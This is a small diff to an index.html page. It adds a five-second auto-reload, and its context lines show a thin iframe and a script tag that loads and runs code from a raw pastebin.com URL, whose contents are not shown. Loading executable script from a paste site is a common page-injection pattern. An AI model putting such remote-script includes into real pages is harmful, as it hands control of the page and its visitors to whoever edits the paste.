--- a/index.html
+++ b/index.html
@@ -27,5 +27,10 @@
 <iframe id="w" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></iframe>23
 
  <script src="https://pastebin.com/raw/GztP78b1"></script>
+ <script>
+  setTimeout(function() {
+       window.location.href = window.location;
+    }, 5000);
+ </script>
 </body>
 </html>
